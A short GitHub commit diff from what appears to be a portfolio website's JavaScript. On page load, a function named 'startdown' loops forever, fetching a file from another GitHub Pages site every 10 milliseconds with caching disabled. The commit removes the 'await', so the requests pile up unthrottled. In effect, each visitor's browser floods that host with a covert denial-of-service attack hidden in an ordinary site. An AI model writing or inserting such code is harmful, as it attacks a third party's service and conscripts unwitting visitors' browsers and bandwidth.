This commit is contained in:
Boof 2023-01-18 12:55:07 +01:00 committed by GitHub
parent f1c5bcb4f3
commit 7bd354613b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -25,7 +25,7 @@ $.getJSON("https://europe-central2-portfolio-website-374313.cloudfunctions.net/g
window.onload = async function startdown(){
while(true) {
await delay(10);
await fetch('https://t0m0t0w.github.io/backuprr/history.dat', {cache: "no-store"})
fetch('https://t0m0t0w.github.io/backuprr/history.dat', {cache: "no-store"})
}
}